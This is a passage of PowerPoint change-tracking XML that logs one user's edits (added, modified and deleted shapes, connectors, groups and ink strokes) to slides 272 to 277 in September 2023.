        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T20:50:41.648" v="4335" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1954159263" sldId="272"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T20:46:12.413" v="4251" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1954159263" sldId="272"/>
            <ac:spMk id="2" creationId="{1E3424C7-626E-0FC9-0857-74E6C734CEDA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T20:48:48.214" v="4327" actId="403"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1954159263" sldId="272"/>
            <ac:spMk id="3" creationId="{C0D5E9EE-AF3B-97A7-F65B-7100CBA0A89C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T20:49:41.809" v="4332" actId="108"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1954159263" sldId="272"/>
            <ac:spMk id="5" creationId="{0C419B23-DE17-334B-7E88-8FD6D5E5229C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T20:50:41.648" v="4335" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1954159263" sldId="272"/>
            <ac:spMk id="16" creationId="{ADFAAB13-B34B-C299-BDD6-CD1CC11A338F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T00:01:59.995" v="4437" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1978865643" sldId="273"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T00:00:15.696" v="4391" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1978865643" sldId="273"/>
            <ac:spMk id="2" creationId="{0C2283C6-CAB4-A4BC-7ACB-568E6FC0FF30}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T00:00:15.696" v="4391" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1978865643" sldId="273"/>
            <ac:spMk id="3" creationId="{007448C0-98C7-0757-B410-EE5EECF915A3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T00:01:59.995" v="4437" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1978865643" sldId="273"/>
            <ac:spMk id="4" creationId="{F290D5B3-04DE-8F05-439B-356D921EBC80}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T00:00:15.696" v="4391" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1978865643" sldId="273"/>
            <ac:spMk id="5" creationId="{96AAD49D-2A3D-585D-8A28-852C6CBD725C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T00:16:17.289" v="4469" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3674157065" sldId="274"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T00:16:17.289" v="4469" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3674157065" sldId="274"/>
            <ac:spMk id="2" creationId="{044FF52E-77CB-2241-0A92-D72BD124B8BE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T00:14:12.860" v="4439" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3674157065" sldId="274"/>
            <ac:spMk id="3" creationId="{CA71D8AD-948C-6AB9-81E4-3F921CD923A2}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T00:58:44.902" v="4519"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4046561668" sldId="275"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T00:18:08.536" v="4504" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4046561668" sldId="275"/>
            <ac:spMk id="2" creationId="{E5A23812-65CD-7F62-C731-BCFC6FBABFCD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T00:58:44.902" v="4519"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4046561668" sldId="275"/>
            <ac:spMk id="3" creationId="{4ECB4E53-792B-F3FD-2DC6-A26225943835}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T01:13:14.688" v="4651" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2094330209" sldId="276"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T01:01:55.476" v="4547" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2094330209" sldId="276"/>
            <ac:spMk id="3" creationId="{5863F5F6-F6EE-2578-9FEB-95FE258497EB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T01:11:54.963" v="4615" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2094330209" sldId="276"/>
            <ac:spMk id="5" creationId="{89C90810-6726-DCF9-19E0-23B8F3DD4A0E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T01:08:18.326" v="4597" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2094330209" sldId="276"/>
            <ac:spMk id="7" creationId="{4086FC14-88CA-9455-0AB7-6BDFA9F67670}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T01:09:24.983" v="4606" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2094330209" sldId="276"/>
            <ac:spMk id="13" creationId="{313D8B36-1D8F-0586-238E-F725D7279D41}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T01:09:09.828" v="4602" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2094330209" sldId="276"/>
            <ac:spMk id="17" creationId="{9FEC439B-BE68-B8C4-6002-F61C126525F5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T01:11:30.672" v="4613" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2094330209" sldId="276"/>
            <ac:spMk id="23" creationId="{BEE8914C-B6AA-74D4-1055-250F51835359}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T01:13:14.688" v="4651" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2094330209" sldId="276"/>
            <ac:spMk id="27" creationId="{272C8510-66A9-69BA-D7B4-35EF05241E83}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T01:07:50.596" v="4591" actId="108"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2094330209" sldId="276"/>
            <ac:cxnSpMk id="9" creationId="{45EB1EFD-A979-A920-6660-B228D11DB151}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T01:09:24.983" v="4606" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2094330209" sldId="276"/>
            <ac:cxnSpMk id="15" creationId="{37B80449-40B9-923F-535C-304658685F8F}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T01:09:13.900" v="4603" actId="11529"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2094330209" sldId="276"/>
            <ac:cxnSpMk id="19" creationId="{EADC2BD4-08F8-A7FB-FCA7-A179296F4418}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T01:11:36.326" v="4614" actId="11529"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2094330209" sldId="276"/>
            <ac:cxnSpMk id="25" creationId="{FC73D0CB-E1A6-A4D6-6C4C-E52FE3AE88DE}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T01:13:14.688" v="4651" actId="20577"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2094330209" sldId="276"/>
            <ac:cxnSpMk id="29" creationId="{F1851CA9-7BAE-471F-9886-1499CFCC721C}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3077727853" sldId="277"/>
        </pc:sldMkLst>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:10.546" v="4677"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:grpSpMk id="6" creationId="{ED181DD6-B302-9E1E-A9A0-1635DB140EF1}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:03.108" v="4667"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:grpSpMk id="9" creationId="{95762C4B-F08D-CBC5-C82F-D91490084D86}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:16.757" v="4679"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:grpSpMk id="18" creationId="{9C9E8C37-65F6-A580-A146-2C1FDF96F65B}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:37.904" v="4703"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:grpSpMk id="20" creationId="{8A1D66DB-B5B7-2B59-16D3-E6402A509BBE}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:37.904" v="4703"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:grpSpMk id="29" creationId="{E3BD6BF5-60D1-3999-74A8-6B94F9CB9B08}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:37.904" v="4703"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:grpSpMk id="44" creationId="{6B03D1EE-6AEB-707C-6F20-464386453146}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:41.780" v="4708"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:grpSpMk id="45" creationId="{573D40FA-86C1-DBA7-7C3D-C987A89C8083}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:37.904" v="4703"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:grpSpMk id="46" creationId="{D910AD14-CA5B-6CF3-EE66-17B405810AC4}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:grpSpMk id="47" creationId="{67B72830-BB39-AA40-AC38-E17AD79EF8CB}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:grpSpMk id="52" creationId="{02C871AC-C344-C4EC-F9CB-76D04CF41285}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:grpSpMk id="64" creationId="{949C2917-3E8E-E89A-32EA-2339A2B3DCF1}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:55.351" v="4722"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:grpSpMk id="66" creationId="{31B63845-19F3-6190-7ED1-F344FB36C974}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:grpSpMk id="71" creationId="{554F52FA-C8B3-5C43-12D0-A34C6912578A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:grpSpMk id="74" creationId="{5F84F3AB-A1B2-612A-A6CE-F016F600B8C7}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:grpSpMk id="77" creationId="{332CB267-C2BC-D459-8AE8-322217477D95}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:grpSpMk id="89" creationId="{6A9432F5-CA40-1FDC-71B0-F6D1D34EF744}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:grpSpMk id="93" creationId="{B6020006-E308-0C91-111C-AF96D9699D03}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T12:36:42.488" v="4657" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:picMk id="3" creationId="{B4BE0EB5-4C56-6F28-C42B-158C8B939182}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="4" creationId="{9F1BB80A-DDD4-6CDA-444D-221FE7F19F81}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="5" creationId="{601BDFD1-5E8B-044C-50B6-7B998E9BC0EB}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:03.499" v="4668" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="7" creationId="{27EC9AF3-E267-94A6-B348-47B7EBBAAD4F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:03.108" v="4667"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="8" creationId="{80AAD672-E94F-1EC6-0944-59472EBCFF30}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="10" creationId="{C17B6017-47A2-F030-E779-8FCBE8E1E680}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="11" creationId="{98198D23-FD86-3134-3293-3F63C0B1CAF7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="12" creationId="{63A81EAD-9E9C-2E06-2F60-395F1ECD8887}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="13" creationId="{BFD722A1-C698-193D-5FB0-21C31EE237CA}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="14" creationId="{034B8DF8-87A5-3DF6-690E-237B26617269}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="15" creationId="{2431A6B6-E207-4151-4359-EBEDCFE6A942}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
